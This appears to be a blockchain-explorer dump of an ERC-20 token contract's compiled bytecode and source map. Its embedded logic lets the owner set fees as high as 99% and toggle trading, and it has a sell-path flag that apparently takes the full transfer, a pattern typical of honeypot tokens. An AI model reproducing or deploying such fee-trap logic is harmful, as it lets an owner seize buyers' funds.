8301168501019250505092915050565b6001600160a01b0381168114610d16575f80fd5b5f8060408385031215611d2a575f80fd5b8235611d3581611d05565b946020939093013593505050565b5f805f60608486031215611d55575f80fd5b8335611d6081611d05565b92506020840135611d7081611d05565b929592945050506040919091013590565b5f60208284031215611d91575f80fd5b81356119e481611d05565b5f8060408385031215611dad575f80fd5b50508035926020909101359150565b5f8060408385031215611dcd575f80fd5b8235611dd881611d05565b915060208301358015158114611dec575f80fd5b809150509250929050565b5f60208284031215611e07575f80fd5b5035919050565b5f8060408385031215611e1f575f80fd5b8235611e2a81611d05565b91506020830135611dec81611d05565b600181811c90821680611e4e57607f821691505b602082108103611e6c57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561072f5761072f611e72565b60208082526024908201527f45524332303a204d757374206b656570206665657320617420393925206f72206040820152636c65737360e01b606082015260800190565b808202811582820484141761072f5761072f611e72565b5f82611f0e57634e487b7160e01b5f52601260045260245ffd5b500490565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b8181038181111561072f5761072f611e72565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611fd2575f80fd5b81516119e481611d05565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b8181101561202b5784516001600160a01b031683529383019391830191600101612006565b50506001600160a01b03969096166060850152505050608001529392505050565b5f805f6060848603121561205e575f80fd5b835192506020840151915060408401519050925092509256fea2646970667358221220d561153e57a8217f1fcd761904b15af518ff5adaea3e4db93196695753e606c464736f6c63430008150033

Deployed Bytecode

0x60806040526004361061020a575f3560e01c80638da5cb5b11610113578063c17e43921161009d578063dd62ed3e1161006d578063dd62ed3e14610609578063e2f4560514610628578063f2fde38b1461063d578063f5648a4f1461065c578063f8b45b0514610677575f80fd5b8063c17e4392146105a1578063c8c8ebe4146105c0578063d257b34f146105d5578063d85ba063146105f4575f80fd5b8063a9059cbb116100e3578063a9059cbb1461050c578063bbc0c7421461052b578063beffc7d414610544578063c024666814610563578063c04a541414610582575f80fd5b80638da5cb5b1461049d578063939dedfd146104ba57806395d89b41146104d9578063a457c2d7146104ed575f80fd5b806349bd5a5e116101945780636ddd1713116101645780636ddd17131461040457806370a0823114610422578063715018a61461045657806375f0a8741461046a5780638a8c523c14610489575f80fd5b806349bd5a5e146103665780634fbee19314610399578063610e34b9146103d05780636a486a8e146103ef575f80fd5b806323b872dd116101da57806323b872dd146102d757806327c8f835146102f6578063313ce5671461030b5780633950935114610326578063437f781514610345575f80fd5b806306fdde0314610215578063095ea7b31461023f5780631694505e1461026e57806318160ddd146102b9575f80fd5b3661021157005b5f80fd5b348015610220575f80fd5b5061022961068c565b6040516102369190611cba565b60405180910390f35b34801561024a575f80fd5b5061025e610259366004611d19565b61071c565b6040519015158152602001610236565b348015610279575f80fd5b506102a17f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6040516001600160a01b039091168152602001610236565b3480156102c4575f80fd5b506002545b604051908152602001610236565b3480156102e2575f80fd5b5061025e6102f1366004611d43565b610735565b348015610301575f80fd5b506102a161dead81565b348015610316575f80fd5b5060405160128152602001610236565b348015610331575f80fd5b5061025e610340366004611d19565b610758565b348015610350575f80fd5b5061036461035f366004611d81565b610779565b005b348015610371575f80fd5b506102a17f000000000000000000000000a3a0cf2167769dc78f2b305ef911f2763e11fb8181565b3480156103a4575f80fd5b5061025e6103b3366004611d81565b6001600160a01b03165f9081526019602052604090205460ff1690565b3480156103db575f80fd5b506103646103ea366004611d9c565b61081f565b3480156103fa575f80fd5b506102c960105481565b34801561040f575f80fd5b50600b5461025e90610100900460ff1681565b34801561042d575f80fd5b506102c961043c366004611d81565b6001600160a01b03165f9081526020819052604090205490565b348015610461575f80fd5b50610364610873565b348015610475575f80fd5b506006546102a1906001600160a01b031681565b348015610494575f80fd5b50610364610886565b3480156104a8575f80fd5b506005546001600160a01b03166102a1565b3480156104c5575f80fd5b506103646104d4366004611d9c565b61089f565b3480156104e4575f80fd5b506102296109b4565b3480156104f8575f80fd5b5061025e610507366004611d19565b6109c3565b348015610517575f80fd5b5061025e610526366004611d19565b610a3d565b348015610536575f80fd5b50600b5461025e9060ff1681565b34801561054f575f80fd5b5061036461055e366004611d9c565b610a4a565b34801561056e575f80fd5b5061036461057d366004611dbc565b610a9f565b34801561058d575f80fd5b506007546102a1906001600160a01b031681565b3480156105ac575f80fd5b506103646105bb366004611dbc565b610b05565b3480156105cb575f80fd5b506102c960085481565b3480156105e0575f80fd5b5061025e6105ef366004611df7565b610b37565b3480156105ff575f80fd5b506102c9600c5481565b348015610614575f80fd5b506102c9610623366004611e0e565b610c76565b348015610633575f80fd5b506102c960095481565b348015610648575f80fd5b50610364610657366004611d81565b610ca0565b348015610667575f80fd5b506103646018805460ff19169055565b348015610682575f80fd5b506102c9600a5481565b60606003805461069b90611e3a565b80601f01602080910402602001604051908101604052809291908181526020018280546106c790611e3a565b80156107125780601f106106e957610100808354040283529160200191610712565b820191905f5260205f20905b8154815290600101906020018083116106f557829003601f168201915b5050505050905090565b5f33610729818585610d19565b60019150505b92915050565b5f33610742858285610e3c565b61074d858585610eb4565b506001949350505050565b5f3361072981858561076a8383610c76565b6107749190611e86565b610d19565b6107816115de565b6001600160a01b0381166107cf5760405162461bcd60e51b815260206004820152601060248201526f045524332303a204164647265737320360841b60448201526064015b60405180910390fd5b600680546001600160a01b038381166001600160a01b03198316811790935560405191169182917fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b05674905f90a35050565b6108276115de565b600d829055600f819055600e5481906108409084611e86565b61084a9190611e86565b600c8190556063101561086f5760405162461bcd60e51b81526004016107c690611e99565b5050565b61087b6115de565b6108845f611638565b565b61088e6115de565b600b805461ffff1916610101179055565b6108a76115de565b6103e86108b360025490565b6108be906005611edd565b6108c89190611ef4565b8210156109285760405162461bcd60e51b815260206004820152602860248201527f45524332303a2043616e6e6f7420736574206d617854786e206c6f776572207460448201526768616e20302e352560c01b60648201526084016107c6565b6103e861093460025490565b61093f906005611edd565b6109499190611ef4565b8110156109ac5760405162461bcd60e51b815260206004820152602b60248201527f45524332303a2043616e6e6f7420736574206d617857616c6c6574206c6f776560448201526a72207468616e20302e352560a81b60648201526084016107c6565b600a55600855565b60606004805461069b90611e3a565b5f33816109d08286610c76565b905083811015610a305760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016107c6565b61074d8286868403610d19565b5f33610729818585610eb4565b610a526115de565b601182905560138190556012548190610a6b9084611e86565b610a759190611e86565b601081905560178190556063101561086f5760405162461bcd60e51b81526004016107c690611e99565b610aa76115de565b6001600160a01b0382165f81815260196020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610b0d6115de565b6001600160a01b03919091165f908152601a60205260409020805460ff1916911515919091179055565b5f610b406115de565b620186a0610b4d60025490565b610b58906001611edd565b610b629190611ef4565b821015610bd75760405162461bcd60e51b815260206004820152603c60248201527f45524332303a205377617020616d6f756e742063616e6e6f74206265206c6f7760448201527f6572207468616e20302e3030312520746f74616c20737570706c792e0000000060648201526084016107c6565b6103e8610be360025490565b610bee906005611edd565b610bf89190611ef4565b821115610c6d5760405162461bcd60e51b815260206004820152603b60248201527f45524332303a205377617020616d6f756e742063616e6e6f742062652068696760448201527f686572207468616e20302e352520746f74616c20737570706c792e000000000060648201526084016107c6565b50600955600190565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b610ca86115de565b6001600160a01b038116610d0d5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016107c6565b610d1681611638565b50565b6001600160a01b038316610d7b5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016107c6565b6001600160a01b038216610ddc5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016107c6565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f610e478484610c76565b90505f198114610eae5781811015610ea15760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016107c6565b610eae8484848403610d19565b50505050565b6001600160a01b038316610eda5760405162461bcd60e51b81526004016107c690611f13565b6001600160a01b038216610f005760405162461bcd60e51b81526004016107c690611f58565b805f03610f1757610f1283835f611689565b505050565b6005546001600160a01b03848116911614801590610f4357506005546001600160a01b03838116911614155b8015610f5757506001600160a01b03821615155b8015610f6e57506001600160a01b03821661dead14155b8015610f845750600554600160a01b900460ff16155b1561129e57600b5460ff1661101c576001600160a01b0383165f9081526019602052604090205460ff1680610fd057506001600160a01b0382165f9081526019602052604090205460ff165b61101c5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a2054726164696e67206973206e6f74206163746976652e00000060448201526064016107c6565b6001600160a01b0383165f908152601b602052604090205460ff16801561105b57506001600160a01b0382165f908152601a602052604090205460ff16155b15611150576008548111156110d85760405162461bcd60e51b815260206004820152603c60248201527f45524332303a20427579207472616e7366657220616d6f756e7420657863656560448201527f647320746865206d61785472616e73616374696f6e416d6f756e742e0000000060648201526084016107c6565b600a546001600160a01b0383165f908152602081905260409020546110fd9083611e86565b111561114b5760405162461bcd60e51b815260206004820152601a60248201527f45524332303a204d61782077616c6c657420657863656564656400000000000060448201526064016107c6565b61129e565b6001600160a01b0382165f908152601b602052604090205460ff16801561118f57506001600160a01b0383165f908152601a602052604090205460ff16155b1561120c5760085481111561114b5760405162461bcd60e51b815260206004820152603d60248201527f45524332303a2053656c6c207472616e7366657220616d6f756e74206578636560448201527f65647320746865206d61785472616e73616374696f6e416d6f756e742e00000060648201526084016107c6565b6001600160a01b0382165f908152601a602052604090205460ff1661129e57600a546001600160a01b0383165f908152602081905260409020546112509083611e86565b111561129e5760405162461bcd60e51b815260206004820152601a60248201527f45524332303a204d61782077616c6c657420657863656564656400000000000060448201526064016107c6565b305f90815260208190526040902054600954811080159081906112c85750600b54610100900460ff165b80156112de5750600554600160a01b900460ff16155b801561130257506001600160a01b0385165f908152601b602052604090205460ff16155b801561132657506001600160a01b0385165f9081526019602052604090205460ff16155b801561134a57506001600160a01b0384165f9081526019602052604090205460ff16155b15611378576005805460ff60a01b1916600160a01b17905561136a6117b1565b6005805460ff60a01b191690555b6005546001600160a01b0386165f9081526019602052604090205460ff600160a01b909204821615916127109116806113c857506001600160a01b0386165f9081526019602052604090205460ff165b156113d1575f91505b5f82156115c3576001600160a01b0387165f908152601b602052604090205460ff16801561140057505f601054115b156114cd576018546114379083906114319060ff1615156001146114265761271061142a565b6010545b89906119d9565b906119eb565b90506010546013548261144a9190611edd565b6114549190611ef4565b60165f8282546114649190611e86565b90915550506010546011546114799083611edd565b6114839190611ef4565b60145f8282546114939190611e86565b90915550506010546012546114a89083611edd565b6114b29190611ef4565b60155f8282546114c29190611e86565b909155506115a59050565b6001600160a01b0388165f908152601b602052604090205460ff1680156114f557505f600c54115b156115a5576115146064611431600c54896119d990919063ffffffff16565b9050600c54600f54826115279190611edd565b6115319190611ef4565b60165f8282546115419190611e86565b9091555050600c54600d546115569083611edd565b6115609190611ef4565b60145f8282546115709190611e86565b9091555050600c54600e546115859083611edd565b61158f9190611ef4565b60155f82825461159f9190611e86565b90915550505b80156115b6576115b6883083611689565b6115c08187611f9b565b95505b6115ce888888611689565b5050601754601055505050505050565b6005546001600160a01b031633146108845760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016107c6565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0383166116af5760405162461bcd60e51b81526004016107c690611f13565b6001600160a01b0382166116d55760405162461bcd60e51b81526004016107c690611f58565b6001600160a01b0383165f908152602081905260409020548181101561174c5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016107c6565b6001600160a01b038481165f81815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610eae565b305f9081526020819052604081205490505f6015546014546016546117d69190611e86565b6117e09190611e86565b90505f8215806117ee575081155b156117f857505050565b600954611806906014611edd565b83111561181e5760095461181b906014611edd565b92505b5f600283601654866118309190611edd565b61183a9190611ef4565b6118449190611ef4565b90505f61185185836119f6565b90504761185d82611a01565b5f61186847836119f6565b90505f61188487611431601454856119d990919063ffffffff16565b90505f6118a088611431601554866119d990919063ffffffff16565b90505f816118ae8486611f9b565b6118b89190611f9b565b5f60168190556014819055601555905086158015906118d657505f81115b15611929576118e58782611bb7565b601654604080518881526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b6006546040516001600160a01b039091169084905f81818185875af1925050503d805f8114611973576040519150601f19603f3d011682016040523d82523d5f602084013e611978565b606091505b50506007546040519199506001600160a01b03169047905f81818185875af1925050503d805f81146119c5576040519150601f19603f3d011682016040523d82523d5f602084013e6119ca565b606091505b50505050505050505050505050565b5f6119e48284611edd565b9392505050565b5f6119e48284611ef4565b5f6119e48284611f9b565b6040805160028082526060820183525f9260208301908036833701905050905030815f81518110611a3457611a34611fae565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611ab0573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611ad49190611fc2565b81600181518110611ae757611ae7611fae565b60200260200101906001600160a01b031690816001600160a01b031681525050611b32307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610d19565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac94790611b869085905f90869030904290600401611fdd565b5f604051808303815f87803b158015611b9d575f80fd5b505af1158015611baf573d5f803e3d5ffd5b505050505050565b611be2307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610d19565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663f305d7198230855f80611c286005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015611c8e573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190611cb3919061204c565b5050505050565b5f6020808352835180828501525f5b81811015611ce557858101830151858201604001528201611cc9565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610d16575f80fd5b5f8060408385031215611d2a575f80fd5b8235611d3581611d05565b946020939093013593505050565b5f805f60608486031215611d55575f80fd5b8335611d6081611d05565b92506020840135611d7081611d05565b929592945050506040919091013590565b5f60208284031215611d91575f80fd5b81356119e481611d05565b5f8060408385031215611dad575f80fd5b50508035926020909101359150565b5f8060408385031215611dcd575f80fd5b8235611dd881611d05565b915060208301358015158114611dec575f80fd5b809150509250929050565b5f60208284031215611e07575f80fd5b5035919050565b5f8060408385031215611e1f575f80fd5b8235611e2a81611d05565b91506020830135611dec81611d05565b600181811c90821680611e4e57607f821691505b602082108103611e6c57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561072f5761072f611e72565b60208082526024908201527f45524332303a204d757374206b656570206665657320617420393925206f72206040820152636c65737360e01b606082015260800190565b808202811582820484141761072f5761072f611e72565b5f82611f0e57634e487b7160e01b5f52601260045260245ffd5b500490565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b8181038181111561072f5761072f611e72565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611fd2575f80fd5b81516119e481611d05565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b8181101561202b5784516001600160a01b031683529383019391830191600101612006565b50506001600160a01b03969096166060850152505050608001529392505050565b5f805f6060848603121561205e575f80fd5b835192506020840151915060408401519050925092509256fea2646970667358221220d561153e57a8217f1fcd761904b15af518ff5adaea3e4db93196695753e606c464736f6c63430008150033

Deployed Bytecode Sourcemap

35027:12932:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9762:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12263:242;;;;;;;;;;-1:-1:-1;12263:242:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;12263:242:0;1023:187:1;35104:51:0;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;1406:32:1;;;1388:51;;1376:2;1361:18;35104:51:0;1215:230:1;10891:108:0;;;;;;;;;;-1:-1:-1;10979:12:0;;10891:108;;;1596:25:1;;;1584:2;1569:18;10891:108:0;1450:177:1;13085:295:0;;;;;;;;;;-1:-1:-1;13085:295:0;;;;;:::i;:::-;;:::i;35207:53::-;;;;;;;;;;;;35253:6;35207:53;;10733:93;;;;;;;;;;-1:-1:-1;10733:93:0;;10816:2;2443:36:1;;2431:2;2416:18;10733:93:0;2301:184:1;13789:270:0;;;;;;;;;;-1:-1:-1;13789:270:0;;;;;:::i;:::-;;:::i;40623:328::-;;;;;;;;;;-1:-1:-1;40623:328:0;;;;;:::i;:::-;;:::i;:::-;;35162:38;;;;;;;;;;;;;;;41431:126;;;;;;;;;;-1:-1:-1;41431:126:0;;;;;:::i;:::-;-1:-1:-1;;;;;41521:28:0;41497:4;41521:28;;;:19;:28;;;;;;;;;41431:126;39843:359;;;;;;;;;;-1:-1:-1;39843:359:0;;;;;:::i;:::-;;:::i;35724:28::-;;;;;;;;;;;;;;;;35532:31;;;;;;;;;;-1:-1:-1;35532:31:0;;;;;;;;;;;11062:177;;;;;;;;;;-1:-1:-1;11062:177:0;;;;;:::i;:::-;-1:-1:-1;;;;;11213:18:0;11181:7;11213:18;;;;;;;;;;;;11062:177;3142:103;;;;;;;;;;;;;:::i;35299:30::-;;;;;;;;;;-1:-1:-1;35299:30:0;;;;-1:-1:-1;;;;;35299:30:0;;;38522:112;;;;;;;;;;;;;:::i;2501:87::-;;;;;;;;;;-1:-1:-1;2574:6:0;;-1:-1:-1;;;;;2574:6:0;2501:87;;39161:502;;;;;;;;;;-1:-1:-1;39161:502:0;;;;;:::i;:::-;;:::i;9981:104::-;;;;;;;;;;;;;:::i;14562:505::-;;;;;;;;;;-1:-1:-1;14562:505:0;;;;;:::i;:::-;;:::i;11445:234::-;;;;;;;;;;-1:-1:-1;11445:234:0;;;;;:::i;:::-;;:::i;35492:33::-;;;;;;;;;;-1:-1:-1;35492:33:0;;;;;;;;40210:405;;;;;;;;;;-1:-1:-1;40210:405:0;;;;;:::i;:::-;;:::i;40959:182::-;;;;;;;;;;-1:-1:-1;40959:182:0;;;;;:::i;:::-;;:::i;35336:32::-;;;;;;;;;;-1:-1:-1;35336:32:0;;;;-1:-1:-1;;;;;35336:32:0;;;39671:164;;;;;;;;;;-1:-1:-1;39671:164:0;;;;;:::i;:::-;;:::i;35377:35::-;;;;;;;;;;;;;;;;38642:511;;;;;;;;;;-1:-1:-1;38642:511:0;;;;;:::i;:::-;;:::i;35572:27::-;;;;;;;;;;;;;;;;11742:201;;;;;;;;;;-1:-1:-1;11742:201:0;;;;;:::i;:::-;;:::i;35419:33::-;;;;;;;;;;;;;;;;3400:238;;;;;;;;;;-1:-1:-1;3400:238:0;;;;;:::i;:::-;;:::i;41345:78::-;;;;;;;;;;;;41401:6;:14;;-1:-1:-1;;41401:14:0;;;41345:78;35459:24;;;;;;;;;;;;;;;;9762:100;9816:13;9849:5;9842:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9762:100;:::o;12263:242::-;12382:4;1126:10;12443:32;1126:10;12459:7;12468:6;12443:8;:32::i;:::-;12493:4;12486:11;;;12263:242;;;;;:::o;13085:295::-;13216:4;1126:10;13274:38;13290:4;1126:10;13305:6;13274:15;:38::i;:::-;13323:27;13333:4;13339:2;13343:6;13323:9;:27::i;:::-;-1:-1:-1;13368:4:0;;13085:295;-1:-1:-1;;;;13085:295:0:o;13789:270::-;13904:4;1126:10;13965:64;1126:10;13981:7;14018:10;13990:25;1126:10;13981:7;13990:9;:25::i;:::-;:38;;;;:::i;:::-;13965:8;:64::i;40623:328::-;2387:13;:11;:13::i;:::-;-1:-1:-1;;;;;40735:30:0;::::1;40727:59;;;::::0;-1:-1:-1;;;40727:59:0;;4843:2:1;40727:59:0::1;::::0;::::1;4825:21:1::0;4882:2;4862:18;;;4855:30;-1:-1:-1;;;4901:18:1;;;4894:46;4957:18;;40727:59:0::1;;;;;;;;;40817:15;::::0;;-1:-1:-1;;;;;40843:34:0;;::::1;-1:-1:-1::0;;;;;;40843:34:0;::::1;::::0;::::1;::::0;;;40893:50:::1;::::0;40817:15;::::1;::::0;;;40893:50:::1;::::0;40797:17:::1;::::0;40893:50:::1;40716:235;40623:328:::0;:::o;39843:359::-;2387:13;:11;:13::i;:::-;39964:15:::1;:31:::0;;;40006:15:::1;:31:::0;;;40081:17:::1;::::0;40024:13;;40063:35:::1;::::0;39982:13;40063:35:::1;:::i;:::-;:53;;;;:::i;:::-;40048:12;:68:::0;;;40151:2:::1;-1:-1:-1::0;40135:18:0::1;40127:67;;;;-1:-1:-1::0;;;40127:67:0::1;;;;;;;:::i;:::-;39843:359:::0;;:::o;3142:103::-;2387:13;:11;:13::i;:::-;3207:30:::1;3234:1;3207:18;:30::i;:::-;3142:103::o:0;38522:112::-;2387:13;:11;:13::i;:::-;38577::::1;:20:::0;;-1:-1:-1;;38608:18:0;;;;;38522:112::o;39161:502::-;2387:13;:11;:13::i;:::-;39350:4:::1;39329:13;10979:12:::0;;;10891:108;39329:13:::1;:17;::::0;39345:1:::1;39329:17;:::i;:::-;39328:26;;;;:::i;:::-;39314:9;:41;;39292:131;;;::::0;-1:-1:-1;;;39292:131:0;;5988:2:1;39292:131:0::1;::::0;::::1;5970:21:1::0;6027:2;6007:18;;;6000:30;6066:34;6046:18;;;6039:62;-1:-1:-1;;;6117:18:1;;;6110:38;6165:19;;39292:131:0::1;5786:404:1::0;39292:131:0::1;39498:4;39477:13;10979:12:::0;;;10891:108;39477:13:::1;:17;::::0;39493:1:::1;39477:17;:::i;:::-;39476:26;;;;:::i;:::-;39456:15;:47;;39434:140;;;::::0;-1:-1:-1;;;39434:140:0;;6397:2:1;39434:140:0::1;::::0;::::1;6379:21:1::0;6436:2;6416:18;;;6409:30;6475:34;6455:18;;;6448:62;-1:-1:-1;;;6526:18:1;;;6519:41;6577:19;;39434:140:0::1;6195:407:1::0;39434:140:0::1;39585:9;:27:::0;39623:20:::1;:32:::0;39161:502::o;9981:104::-;10037:13;10070:7;10063:14;;;;;:::i;14562:505::-;14682:4;1126:10;14682:4;14770:25;1126:10;14787:7;14770:9;:25::i;:::-;14743:52;;14848:15;14828:16;:35;;14806:122;;;;-1:-1:-1;;;14806:122:0;;6809:2:1;14806:122:0;;;6791:21:1;6848:2;6828:18;;;6821:30;6887:34;6867:18;;;6860:62;-1:-1:-1;;;6938:18:1;;;6931:35;6983:19;;14806:122:0;6607:401:1;14806:122:0;14964:60;14973:5;14980:7;15008:15;14989:16;:34;14964:8;:60::i;11445:234::-;11560:4;1126:10;11621:28;1126:10;11638:2;11642:6;11621:9;:28::i;40210:405::-;2387:13;:11;:13::i;:::-;40332:16:::1;:32:::0;;;40375:16:::1;:32:::0;;;40453:18:::1;::::0;40394:13;;40434:37:::1;::::0;40351:13;40434:37:::1;:::i;:::-;:56;;;;:::i;:::-;40418:13;:72:::0;;;40501:11:::1;:27:::0;;;40564:2:::1;-1:-1:-1::0;40547:19:0::1;40539:68;;;;-1:-1:-1::0;;;40539:68:0::1;;;;;;;:::i;40959:182::-:0;2387:13;:11;:13::i;:::-;-1:-1:-1;;;;;41044:28:0;::::1;;::::0;;;:19:::1;:28;::::0;;;;;;;;:39;;-1:-1:-1;;41044:39:0::1;::::0;::::1;;::::0;;::::1;::::0;;;41099:34;;1163:41:1;;;41099:34:0::1;::::0;1136:18:1;41099:34:0::1;;;;;;;40959:182:::0;;:::o;39671:164::-;2387:13;:11;:13::i;:::-;-1:-1:-1;;;;;39781:39:0;;;::::1;;::::0;;;:31:::1;:39;::::0;;;;:46;;-1:-1:-1;;39781:46:0::1;::::0;::::1;;::::0;;;::::1;::::0;;39671:164::o;38642:511::-;38750:4;2387:13;:11;:13::i;:::-;38829:6:::1;38808:13;10979:12:::0;;;10891:108;38808:13:::1;:17;::::0;38824:1:::1;38808:17;:::i;:::-;38807:28;;;;:::i;:::-;38794:9;:41;;38772:151;;;::::0;-1:-1:-1;;;38772:151:0;;7215:2:1;38772:151:0::1;::::0;::::1;7197:21:1::0;7254:2;7234:18;;;7227:30;7293:34;7273:18;;;7266:62;7364:30;7344:18;;;7337:58;7412:19;;38772:151:0::1;7013:424:1::0;38772:151:0::1;38991:4;38970:13;10979:12:::0;;;10891:108;38970:13:::1;:17;::::0;38986:1:::1;38970:17;:::i;:::-;38969:26;;;;:::i;:::-;38956:9;:39;;38934:148;;;::::0;-1:-1:-1;;;38934:148:0;;7644:2:1;38934:148:0::1;::::0;::::1;7626:21:1::0;7683:2;7663:18;;;7656:30;7722:34;7702:18;;;7695:62;7793:29;7773:18;;;7766:57;7840:19;;38934:148:0::1;7442:423:1::0;38934:148:0::1;-1:-1:-1::0;39093:18:0::1;:30:::0;39141:4:::1;::::0;38642:511::o;11742:201::-;-1:-1:-1;;;;;11908:18:0;;;11876:7;11908:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11742:201::o;3400:238::-;2387:13;:11;:13::i;:::-;-1:-1:-1;;;;;3503:22:0;::::1;3481:110;;;::::0;-1:-1:-1;;;3481:110:0;;8072:2:1;3481:110:0::1;::::0;::::1;8054:21:1::0;8111:2;8091:18;;;8084:30;8150:34;8130:18;;;8123:62;-1:-1:-1;;;8201:18:1;;;8194:36;8247:19;;3481:110:0::1;7870:402:1::0;3481:110:0::1;3602:28;3621:8;3602:18;:28::i;:::-;3400:238:::0;:::o;18695:380::-;-1:-1:-1;;;;;18831:19:0;;18823:68;;;;-1:-1:-1;;;18823:68:0;;8479:2:1;18823:68:0;;;8461:21:1;8518:2;8498:18;;;8491:30;8557:34;8537:18;;;8530:62;-1:-1:-1;;;8608:18:1;;;8601:34;8652:19;;18823:68:0;8277:400:1;18823:68:0;-1:-1:-1;;;;;18910:21:0;;18902:68;;;;-1:-1:-1;;;18902:68:0;;8884:2:1;18902:68:0;;;8866:21:1;8923:2;8903:18;;;8896:30;8962:34;8942:18;;;8935:62;-1:-1:-1;;;9013:18:1;;;9006:32;9055:19;;18902:68:0;8682:398:1;18902:68:0;-1:-1:-1;;;;;18983:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19035:32;;1596:25:1;;;19035:32:0;;1569:18:1;19035:32:0;;;;;;;18695:380;;;:::o;19366:502::-;19501:24;19528:25;19538:5;19545:7;19528:9;:25::i;:::-;19501:52;;-1:-1:-1;;19568:16:0;:37;19564:297;;19668:6;19648:16;:26;;19622:117;;;;-1:-1:-1;;;19622:117:0;;9287:2:1;19622:117:0;;;9269:21:1;9326:2;9306:18;;;9299:30;9365:31;9345:18;;;9338:59;9414:18;;19622:117:0;9085:353:1;19622:117:0;19783:51;19792:5;19799:7;19827:6;19808:16;:25;19783:8;:51::i;:::-;19490:378;19366:502;;;:::o;41565:3723::-;-1:-1:-1;;;;;41697:18:0;;41689:68;;;;-1:-1:-1;;;41689:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;41776:16:0;;41768:64;;;;-1:-1:-1;;;41768:64:0;;;;;;;:::i;:::-;41849:6;41859:1;41849:11;41845:93;;41877:28;41893:4;41899:2;41903:1;41877:15;:28::i;:::-;41565:3723;;;:::o;41845:93::-;2574:6;;-1:-1:-1;;;;;41968:15:0;;;2574:6;;41968:15;;;;:45;;-1:-1:-1;2574:6:0;;-1:-1:-1;;;;;42000:13:0;;;2574:6;;42000:13;;41968:45;:78;;;;-1:-1:-1;;;;;;42030:16:0;;;;41968:78;:112;;;;-1:-1:-1;;;;;;42063:17:0;;35253:6;42063:17;;41968:112;:138;;;;-1:-1:-1;42098:8:0;;-1:-1:-1;;;42098:8:0;